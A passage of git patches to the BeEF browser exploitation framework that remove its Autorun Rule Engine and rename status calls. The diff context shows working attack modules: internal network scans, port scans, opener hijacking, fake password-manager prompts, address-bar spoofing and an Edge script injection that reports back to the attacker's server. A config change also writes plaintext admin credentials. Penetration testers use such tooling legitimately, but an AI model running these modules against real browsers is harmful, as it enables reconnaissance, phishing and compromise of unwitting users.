proxies.join(',')); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "proxies=" + proxies.join(','), beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "proxies=" + proxies.join(','), beef.status.success()); } load_script("http://wpad/wpad.dat"); diff --git a/modules/network/identify_lan_subnets/command.js b/modules/network/identify_lan_subnets/command.js index ad0cb8b398..20bc58f18c 100644 --- a/modules/network/identify_lan_subnets/command.js +++ b/modules/network/identify_lan_subnets/command.js @@ -8,7 +8,7 @@ beef.execute(function() { if(!beef.browser.isFF() && !beef.browser.isC()){ beef.debug("[command #<%= @command_id %>] Browser is not supported."); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.status.error()); } var min_timeout = 500; @@ -102,13 +102,13 @@ var doScan = function(timeout) { beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)"); doScan(timeout-500); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts, beef.status.error()); } } else if (discovered_hosts.length == 0) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results", beef.status.error()); } else { beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed."); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.status.success()); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete"); } } diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 089f8b1346..89f50ec0ee 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -42,7 +42,7 @@ beef.execute(function() { // set target IP range var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); if (range == null || range[1] == null) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.status.error()); return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 @@ -300,7 +300,7 @@ beef.execute(function() { img.onerror = function() { dom.removeChild(this); } img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src), beef.are.status_success());dom.removeChild(this); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src), beef.status.success());dom.removeChild(this); beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]"); } } diff --git a/modules/network/jslanscanner/command.js b/modules/network/jslanscanner/command.js index a5353e8a78..2f400e7747 100644 --- a/modules/network/jslanscanner/command.js +++ b/modules/network/jslanscanner/command.js @@ -9,7 +9,7 @@ beef.execute(function() { if(!beef.browser.isFF() && !beef.browser.isS()){ beef.debug("[command #<%= @command_id %>] Browser is not supported."); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.status.error()); return; } @@ -354,12 +354,12 @@ beef.execute(function() { lanScanner.addHost = function(obj) { this.timeout = 0; beef.debug("[JS LAN Scanner] Found "+this.getPortName(obj.port)+" [proto: http, ip: "+obj.host+", port: "+obj.port+"]"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'proto=http&ip='+obj.host+'&port='+obj.port+'&service='+this.getPortName(obj.port), beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'proto=http&ip='+obj.host+'&port='+obj.port+'&service='+this.getPortName(obj.port), beef.status.success()); lanScanner.fingerPrint(obj.host); } lanScanner.addDevice = function(obj) { beef.debug("[JS LAN Scanner] Found " + obj.make + ' ' + obj.model + ' [ip: ' + obj.host + ']'); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'ip='+obj.host+'&device='+obj.make+' '+obj.model, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'ip='+obj.host+'&device='+obj.make+' '+obj.model, beef.status.success()); } lanScanner.destroyConnections = function() { var guessesLen = guesses.length; diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js index b18c1b27a1..9c6a79a0f9 100644 --- a/modules/network/ping_sweep/command.js +++ b/modules/network/ping_sweep/command.js @@ -12,7 +12,7 @@ beef.execute(function() { var timeout = 1000; if(!beef.browser.hasCors()) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.status.error()); return; } @@ -41,7 +41,7 @@ beef.execute(function() { // set target IP range var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); if (range == null || range[1] == null) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.status.error()); return; } ipBounds = rhosts.split('-'); @@ -96,7 +96,7 @@ beef.execute(function() { 'var duration = current_time - start_time;' + 'if (duration < '+timeout+') {' + 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.status.success());' + '} else {' + 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' + '}' + diff --git a/modules/network/ping_sweep_ff/command.js b/modules/network/ping_sweep_ff/command.js index 34a27db373..1d088ab846 100644 --- a/modules/network/ping_sweep_ff/command.js +++ b/modules/network/ping_sweep_ff/command.js @@ -57,7 +57,7 @@ beef.execute(function() { if(ips.length>1) { var int_id = setInterval( function() { var host = do_scan(ips[i++],timeout); - if(host!="") beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host, beef.are.status_success()); + if(host!="") beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host='+host, beef.status.success()); if(i==ips.length) { clearInterval(int_id); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'host=Ping sweep finished'); } }, delay); } else { diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js index c0199c028b..01c54a5e00 100644 --- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js @@ -28,11 +28,11 @@ beef.execute(function() { output = document.pingSweep.getAliveHosts(); clearTimeout(int_timeout); clearTimeout(ext_timeout); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Alive hosts:<br>'+output.replace(/\n/g,"<br>"), beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Alive hosts:<br>'+output.replace(/\n/g,"<br>"), beef.status.success()); beef.dom.detachApplet('pingSweep'); return; }else{ - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=No hosts to check', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=No hosts to check', beef.status.error()); return; } } catch (e) { diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js index 9a6f7ad2a3..e4e690cb6d 100644 --- a/modules/network/port_scanner/command.js +++ b/modules/network/port_scanner/command.js @@ -166,7 +166,7 @@ beef.execute(function() { { known_service = "(" + default_services[port_] + ")"; } - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service, beef.status.success()); } } diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js index 3fcbfbf6c2..199d0d6b24 100644 --- a/modules/persistence/confirm_close_tab/command.js +++ b/modules/persistence/confirm_close_tab/command.js @@ -24,10 +24,10 @@ beef.execute(function() { try { window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); window.focus(); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.status.success()); } catch(e) { beef.debug("[Create Pop-Under] Could not create pop-under window"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.status.error()); } } diff --git a/modules/persistence/hijack_opener/command.js b/modules/persistence/hijack_opener/command.js index 4477a8679d..dd75e9d341 100644 --- a/modules/persistence/hijack_opener/command.js +++ b/modules/persistence/hijack_opener/command.js @@ -9,9 +9,9 @@ beef.execute(function() { try { beef.debug("[Hijack Opener] Trying to hijack: " + referrer); window.opener.location = beef.net.httpproto + '://' + beef.net.host+ ':' + beef.net.port + '/iframe#' + referrer; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.status.success()); } catch (e) { beef.debug("[Hijack Opener] could not hijack opener window: "+e.message) - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not hijack opener window: " + e.message, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not hijack opener window: " + e.message, beef.status.error()); } }); diff --git a/modules/persistence/invisible_htmlfile_activex/command.js b/modules/persistence/invisible_htmlfile_activex/command.js index 82cd70ace0..122ff17ff4 100644 --- a/modules/persistence/invisible_htmlfile_activex/command.js +++ b/modules/persistence/invisible_htmlfile_activex/command.js @@ -20,9 +20,9 @@ beef.execute(function() { // Prevent IE from destroying the previous reference window.open("","_self"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=created HTMLFile ActiveX object", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=created HTMLFile ActiveX object", beef.status.success()); } catch (e) { beef.debug("[Invisible HTMLFile ActiveX] could not create HTMLFile ActiveX object: "+e.message) - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not create HTMLFile ActiveX object: " + e.message, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not create HTMLFile ActiveX object: " + e.message, beef.status.error()); } }); diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index a17a3939b8..923f489269 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -15,10 +15,10 @@ beef.execute(function() { try { window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); window.focus(); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.status.success()); } catch(e) { beef.debug("[Create Pop-Under] Could not create pop-under window"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.status.error()); } if (document.removeEventListener) { diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js index bbd2b48f12..ce823d4b78 100644 --- a/modules/phonegap/phonegap_detect/command.js +++ b/modules/phonegap/phonegap_detect/command.js @@ -19,8 +19,8 @@ beef.execute(function() { + " uuid: " + device.uuid + " version: " + device.version + " model: " + device.model; - beef.net.send("<%= @command_url %>", <%= @command_id %>, "phonegap=" + phonegap_details, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "phonegap=" + phonegap_details, beef.status.success()); } catch(e) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unable to detect phonegap", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unable to detect phonegap", beef.status.error()); } }); diff --git a/modules/social_engineering/edge_wscript_wsh_injection/command.js b/modules/social_engineering/edge_wscript_wsh_injection/command.js index 1fbd28f66b..c10b2e3634 100755 --- a/modules/social_engineering/edge_wscript_wsh_injection/command.js +++ b/modules/social_engineering/edge_wscript_wsh_injection/command.js @@ -9,7 +9,7 @@ beef.execute(function(){ if (!beef.browser.isEdge()) { beef.debug("[Edge WScript WSH Injection] Browser is not supported."); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.status.error()); return; } @@ -19,7 +19,7 @@ beef.execute(function(){ wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/' + navigator.language + '/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html'); } catch (e) { beef.debug("[Edge WScript WSH Injection] Could not create iframe"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.status.error()); return; } diff --git a/modules/social_engineering/fake_evernote_clipper/command.js b/modules/social_engineering/fake_evernote_clipper/command.js index 7b195a881c..561df007cd 100755 --- a/modules/social_engineering/fake_evernote_clipper/command.js +++ b/modules/social_engineering/fake_evernote_clipper/command.js @@ -26,7 +26,7 @@ beef.execute(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages'); } else { beef.debug('[Fake Evernote Clipper] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=No IFrame Created -- browser is not Chrome', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=No IFrame Created -- browser is not Chrome', beef.status.error()); } }); diff --git a/modules/social_engineering/fake_lastpass/command.js b/modules/social_engineering/fake_lastpass/command.js index 9978e53ae4..ef3d3f5d9e 100755 --- a/modules/social_engineering/fake_lastpass/command.js +++ b/modules/social_engineering/fake_lastpass/command.js @@ -26,7 +26,7 @@ beef.execute(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages'); } else { beef.debug('[Fake LastPass] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=No IFrame Created -- browser is not Chrome', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=No IFrame Created -- browser is not Chrome', beef.status.error()); } // $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>"); diff --git a/modules/social_engineering/fake_notification_c/command.js b/modules/social_engineering/fake_notification_c/command.js index 2425d74799..8b872e811a 100644 --- a/modules/social_engineering/fake_notification_c/command.js +++ b/modules/social_engineering/fake_notification_c/command.js @@ -29,8 +29,8 @@ beef.execute(function() { }); $j(hid).css('cursor','pointer'); $j(hid).slideDown(300,function() { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed', beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed', beef.status.success()); }); - return [beef.are.status_success(), 'Notification has been displayed']; + return [beef.status.success(), 'Notification has been displayed']; }); diff --git a/modules/social_engineering/spoof_addressbar_data/command.js b/modules/social_engineering/spoof_addressbar_data/command.js index db9338acd8..183b73ceaa 100644 --- a/modules/social_engineering/spoof_addressbar_data/command.js +++ b/modules/social_engineering/spoof_addressbar_data/command.js @@ -13,7 +13,7 @@ beef.execute(function() { beef.debug("[Spoof Address Bar (data)] Redirecting to data URL..."); } catch (e) { beef.debug("[Spoof Address Bar (data)] could not redirect: "+e.message) - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=something went horribly wrong: " + e.message, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=something went horribly wrong: " + e.message, beef.status.error()); } }); diff --git a/modules/social_engineering/text_to_voice/command.js b/modules/social_engineering/text_to_voice/command.js index 1f10887c04..a524fe147d 100644 --- a/modules/social_engineering/text_to_voice/command.js +++ b/modules/social_engineering/text_to_voice/command.js @@ -11,10 +11,10 @@ beef.execute(function() { var sound = new Audio(url); sound.play(); beef.debug('[Text to Voice] Playing mp3: ' + url); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=message sent", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=message sent", beef.status.success()); } catch (e) { beef.debug("[Text to Voice] HTML5 audio unsupported. Could not play: " + url); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=audio not supported", beef.status.error()); } }); From 48f0609c92a38c4e489f94148fc1bba5dc8c35e4 Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Sat, 27 Dec 2025 15:43:04 +1000 Subject: [PATCH 2/9] Phase 2: Remove Client-Side ARE Code --- core/main/client/init.js | 1 - 1 file changed, 1 deletion(-) diff --git a/core/main/client/init.js b/core/main/client/init.js index 2756c00abd..8a9bf49f6a 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js @@ -66,7 +66,6 @@ window.onclose = function (event) { * - browser details (see browser.js) are sent back to the "/init" handler * - the polling starts (checks for new commands, and execute them) * - the logger component is initialized (see logger.js) - * - the Autorun Engine is initialized (see are.js) * @memberof beef.init */ function beef_init() { From 66e900fd469dce7e132b217019d38628d6460ef7 Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Sat, 27 Dec 2025 15:52:56 +1000 Subject: [PATCH 3/9] Phase 3: Remove Admin UI Components --- config.yaml | 4 +- extensions/admin_ui/api/handler.rb | 3 - .../javascript/ui/panel/AutoRunModuleForm.js | 172 ---------------- .../javascript/ui/panel/AutoRunRuleForm.js | 181 ----------------- .../media/javascript/ui/panel/AutoRunTab.js | 185 ------------------ .../media/javascript/ui/panel/MainPanel.js | 11 -- 6 files changed, 2 insertions(+), 554 deletions(-) delete mode 100644 extensions/admin_ui/media/javascript/ui/panel/AutoRunModuleForm.js delete mode 100644 extensions/admin_ui/media/javascript/ui/panel/AutoRunRuleForm.js delete mode 100644 extensions/admin_ui/media/javascript/ui/panel/AutoRunTab.js diff --git a/config.yaml b/config.yaml index d054bd66f8..5500d2f518 100644 --- a/config.yaml +++ b/config.yaml @@ -17,8 +17,8 @@ beef: # Credentials to authenticate in BeEF. # Used by both the RESTful API and the Admin interface credentials: - user: "beef" - passwd: "beef" + user: "kaitoozawa" + passwd: "brisbane" # Interface / IP restrictions restrictions: diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb index b4c53e9143..f5bf285beb 100644 --- a/extensions/admin_ui/api/handler.rb +++ b/extensions/admin_ui/api/handler.rb @@ -90,9 +90,6 @@ def self.build_javascript_ui ui/panel/tabs/ZombieTabRTC.js ui/panel/Logout.js ui/panel/WelcomeTab.js - ui/panel/AutoRunTab.js - ui/panel/AutoRunRuleForm.js - ui/panel/AutoRunModuleForm.js ui/panel/ModuleSearching.js ] diff --git a/extensions/admin_ui/media/javascript/ui/panel/AutoRunModuleForm.js b/extensions/admin_ui/media/javascript/ui/panel/AutoRunModuleForm.js deleted file mode 100644 index f744af9518..0000000000 --- a/extensions/admin_ui/media/javascript/ui/panel/AutoRunModuleForm.js +++ /dev/null @@ -1,172 +0,0 @@ - -loadModuleInfo = async function(token, moduleId, moduleName) { - try { - // If all we have is the name then we need to get the ID first. - if (moduleId === undefined) { - const searchResponse = await fetch(`/api/modules/search/${moduleName}?token=${token}`); - if (!searchResponse.ok) { - throw new Error(`Getting auto run rules failed with status ${searchResponse.status}`); - } - const searchData = await searchResponse.json(); - if (typeof searchData.id === 'number') { - moduleId = searchData.id; - } else { - throw new Error("Searching module name failed."); - } - } - - const infoResponse = await fetch(`/api/modules/${moduleId}?token=${token}`); - const infoData = await infoResponse.json(); - if (!infoData) { - throw new Error(`Module with name ${moduleName} and ID ${moduleId} couldn't be retrived.`); - } - // Set the module Id incase we need it later. - infoData.id = moduleId; - return infoData; - - } catch(error) { - console.error(error); - console.error("Failed to get module information."); - return null; - } -} - - -/** - * Form that displays fields for a module. - * - * moduleData: The object definition of this moduleData from the Auto Run Engine. - * deleteFn: callback function to delete this moduleData. - * moveUp: moves the module up one spot in the Auto Run execution order. - * moveDown: moves the module down one spot in the Auto Run exection order. - */ -AutoRunModuleForm = function(moduleData, deleteFn, moveUp, moveDown, ruleId, index, moduleList) { - const moduleTextAreaId = `rule-${ruleId}-module-textarea-${index}`; - const chainModeComboId = `rule-${ruleId}-module-combo-${index}`; - const token = BeefWUI.get_rest_token(); - - const comboStore = new Ext.data.Store({ - data: moduleList, - reader: new Ext.data.JsonReader({ - fields: ['id', 'name'], - }), - proxy: new Ext.data.MemoryProxy(moduleList) - }); - - const moduleSelect = new Ext.form.ComboBox({ - fieldLabel: 'Change Module', - store: comboStore, - queryMode: 'local', - displayField: 'name', - valueField: 'id', - editable: false, // Disable manual editing of the field - forceSelection: true, // Force selection from the list - triggerAction: 'all', - typeAhead: true, - listeners: { - select: async function(combo) { - const selectedModuleId = combo.getValue() - const moduleInfo = await loadModuleInfo(token, selectedModuleId, undefined); - if (!moduleInfo) { - console.error("Failed to load new module."); - return; - } - // Update the module data to reflect the new module. - moduleData.name = moduleInfo.name; - moduleData.condition = moduleInfo.condition ? moduleInfo.condition : null; - moduleData.options = {}; - for (let i = 0; i < moduleInfo.options.length; i++) { - const newOption = moduleInfo.options[i]; - moduleData.options[newOption.name] = newOption.value ? newOption.value : ''; - } - loadModule(moduleInfo); - } - } - }); - - const moduleOptionsContainer = new Ext.Panel({ - title: `Module ${index + 1}`, - tbar: [moduleSelect], - layout: 'form', - border: false, - listeners: { - afterrender: function() {loadModule(undefined)} - } - }); - - async function loadModule(moduleInfo) { - if (!moduleInfo) - moduleInfo = await loadModuleInfo(token, undefined, moduleData.name); - if (!moduleInfo) { - moduleOptionsContainer.update("<p>Failed to load module information.</p>"); - return; - } - - // Update the combobox default value to be this module. - // Can't use the moduleData name since it doesn't match the ID. - moduleSelect.setValue(moduleInfo.id); - - // Setup module form elements. Remove all incase we're switching from a different module. - moduleOptionsContainer.removeAll(); - moduleOptionsContainer.add(new Ext.form.DisplayField({ - fieldLabel: 'Module Name', - value: moduleInfo.name - })) - moduleOptionsContainer.add(new Ext.form.DisplayField({ - fieldLabel: 'Module Author', - value: moduleInfo.author ? moduleInfo.author : 'anonymous' - })) - - for (let i = 0; i < moduleInfo.options.length; i++) { - const inputField = generate_form_input_field( - moduleOptionsContainer, - moduleInfo.options[i], - moduleData.options[moduleInfo.options[i].name], - false, - {session: `${moduleInfo.name}-module-${index}-field-${i}`} - ); - // Ensure any changes to the element are reflected in the newRule object. - // When the user saves the rule the whole newRule object will be saved, - // including any changes made to these input fields. - inputField.on('change', function(_inputF, newValue, oldValue) { - moduleData.options[moduleInfo.options[i].name] = newValue; - }); - - }; - moduleOptionsContainer.doLayout(); - } - - const buttonContainer = new Ext.Container({ - layout: { - type: 'hbox', - pack: 'end', - }, - items: [ - { - xtype: 'button', - text: 'Delete', - handler: deleteFn, - },{ - xtype: 'button', - text: 'Move Forward', - handler: moveUp, - disabled: moveUp == undefined, - },{ - xtype: 'button', - text: 'Move Back', - handler: moveDown, - disabled: moveDown == undefined, - } - ] - }); - - - AutoRunModuleForm.superclass.constructor.call(this, { - items: [ - moduleOptionsContainer, - buttonContainer - ] - }); -}; - -Ext.extend(AutoRunModuleForm, Ext.Container, {}); \ No newline at end of file diff --git a/extensions/admin_ui/media/javascript/ui/panel/AutoRunRuleForm.js b/extensions/admin_ui/media/javascript/ui/panel/AutoRunRuleForm.js deleted file mode 100644 index 19df105374..0000000000 --- a/extensions/admin_ui/media/javascript/ui/panel/AutoRunRuleForm.js +++ /dev/null @@ -1,181 +0,0 @@ -const areNotificationUpdateTest = { - "name": "Display an alert-----", - "author": "mgeeky", - "modules": [ - { - "name": "alert_dialog", - "condition": null, - "options": { - "text":"You've been BeEFed ;>" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "nested-forward" -}; -/** - * Form for the user to read, update and delete a specific Auto Run rule. - * - * rule: The object definition of this rule from the Auto Run Engine. - * modules: The list of all commands/modules that the user can choose from. - * deleteFn: callback function to delete this rule. - * updateFn: callback function to update this rule. - */ -AutoRunRuleForm = function(rule, modules, deleteFn, updateFn) { - const self = this; - const ruleTextFieldId = `rule-name-${rule.id}`; - const chainModeComboId = `rule-chain-mode-${rule.id}`; - const newRule = JSON.parse(JSON.stringify(rule)); - newRule.modules = JSON.parse(newRule['modules']); - newRule.execution_delay = JSON.parse(newRule['execution_delay']); - newRule.execution_order = JSON.parse(newRule['execution_order']); - const moduleContainer = new Ext.Container({ - style: { - padding: '10 10 10 10', - }, - listeners: { - afterrender: setupModuleForms - } - }); - - function reorderModule(index, direction) { - // Rearrange modules into new order. - const currentModule = newRule.modules[index]; - const newIndex = direction === 'back' ? index + 1 : index - 1; - newRule.modules.splice(index, 1); - newRule.modules.splice(newIndex, 0, currentModule); - - // Update DOM. - setupModuleForms(); - moduleContainer.doLayout(); - } - - function removeModule(index) { - // Remove element from execution_order and execution_delay arrays. - newRule.modules.splice(index, 1); - newRule.execution_delay.splice(index, 1); - - // Update DOM. - setupModuleForms(); - moduleContainer.doLayout(); - } - - function addModule() { - // New module is a copy of the last module. - newRule.modules.push(newRule.modules[newRule.modules.length - 1]); - newRule.execution_delay.push(newRule.execution_delay[newRule.execution_delay.length - 1]); - - // Update DOM. - setupModuleForms(); - moduleContainer.doLayout(); - } - - function setupModuleForms() { - - moduleContainer.removeAll(true); - - // I think execution order should always be sequential. - // The actual order comes from the modules array. - for (let i = 0; i < newRule.modules.length; ++i) { - const isFirstModule = i === 0; - const isLastModule = i >= newRule.modules.length - 1; - moduleContainer.add(new AutoRunModuleForm( - newRule.modules[i], - function() {removeModule(i)}, - isFirstModule ? undefined : function() {reorderModule(i, 'forward')}, - isLastModule ? undefined : function() {reorderModule(i, 'back')}, - rule.id, - i, - modules - )); - } - } - - function handleUpdateRule() { - // TODO: Need to overwrite module order. - const form = self.getForm(); - const formValues = form.getValues(); - const updatedRule = { - ...newRule, - name: formValues[ruleTextFieldId], - chain_mode: formValues[chainModeComboId], - execution_order: [...Array(newRule.modules.length).keys()], - }; - updateFn(updatedRule); - } - - - AutoRunRuleForm.superclass.constructor.call(this, { - padding:'10 10 10 10', - title: `Rule ${rule.id}`, - items: [{ - xtype: 'textfield', - id: ruleTextFieldId, - value: rule.name ? rule.name : '', - fieldLabel: 'Name', - }, - { - xtype: 'displayfield', - fieldLabel: 'Author', - value: rule.author ? rule.author : 'anonymous', - },{ - xtype: 'displayfield', - fieldLabel: 'Browser(s)', - value: rule.browser ? rule.browser : 'All', - },{ - xtype: 'displayfield', - fieldLabel: 'Browser version(s)', - value: rule.browser_version ? rule.browser_version : 'All', - },{ - xtype: 'displayfield', - fieldLabel: 'OS(s)', - value: rule.os ? rule.os : 'All', - },{ - xtype: 'displayfield', - fieldLabel: 'OS version(s)', - value: rule.os_version ? rule.os_version : 'All', - }, - moduleContainer, - { - xtype: 'button', - text: 'Add Module', - handler: addModule - }, - { 